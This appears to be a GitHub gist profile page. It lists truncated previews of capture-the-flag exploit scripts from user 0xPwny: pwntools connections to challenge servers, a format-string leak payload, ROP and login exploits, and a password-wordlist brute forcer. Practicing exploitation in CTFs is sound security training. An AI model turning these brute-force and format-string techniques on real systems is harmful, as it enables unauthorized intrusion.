Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

AJ N 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / test.py
Created February 7, 2016 09:29
test
#!/usr/bin/python
print "hello Madafuckerz"
@0xPwny
0xPwny / FDbruter.py
Last active February 16, 2016 12:51
#!/usr/bin/python
import requests
import re
wordlist = open("/home/crypthon/Downloads/list.txt","rb").readlines() #http://pastebin.com/SjjiH2ua
for x in wordlist:
p = x.replace('\n','')
m = p.replace("\r","")
@0xPwny
0xPwny / guessingame.py
Created April 18, 2016 15:55
PACTF2016 - Guessing GAME
#!/usr/bin/python
from pwn import *
import random
while True:
co = remote('104.236.216.251',64753)
print co.recv()
co.send('abdel\n')
#!/usr/bin/python
#Guess | format string | leaking
#PicoCTF GUESS
from pwn import *
import time
import re
@0xPwny
0xPwny / format2.py
Created December 8, 2016 00:21
Format string 2 - protostar
#!/usr/bin/python
from pwn import *
########STAGE1 GET OFFSET
"""
cnx = remote("172.16.20.132",2020)
trash = "AAAA"+"-%x"*200
cnx.send(trash+"\n")
@0xPwny
0xPwny / 4PPSTR-exploit.py
Last active August 1, 2025 09:37
MCSC16 CTF - 4PPSTR Pwnable Exploit / Abdeljalil Nouiri
#!/usr/bin/python
from pwn import *
con = remote("172.16.20.133",2020)
#!/usr/bin/python
#ROPASAURUSREX - EXPLOIT
#ABDELJALIL NOUIRI
from time import *
import sys
from pwn import *
@0xPwny
0xPwny / exploit.py
Last active February 9, 2017 15:03
EKOpartyCTF - Login exploit
#!/usr/bin/python
#author : Abdeljalil Nouiri
from pwn import *
user = "charly"
passwd = "h4ckTH1s"
con = process("./flag")
@0xPwny
0xPwny / hackim_exploit200.py
Last active May 23, 2017 02:18
HackimCTF 2017
from pwn import *
from libformatstr import *
#Exploit the daemon at 34.198.96.6:9001
#Exploitation Question 1 : 200 pts
#HACKIM CTF2017
#exploit by : Abdeljalil Nouiri
con = remote("34.198.96.6" , 9001)
@0xPwny
0xPwny / ultrababy.py
Created February 22, 2017 20:41
Owasp CTF 2017 - AppSec Africa , PWN 100 : Ultra Baby
#!/usr/bin/python
#OWASPCTF 2017
#ultrababy exploit Code
#Abdeljalil Nouiri
from libformatstr import *
from pwn import *
import sys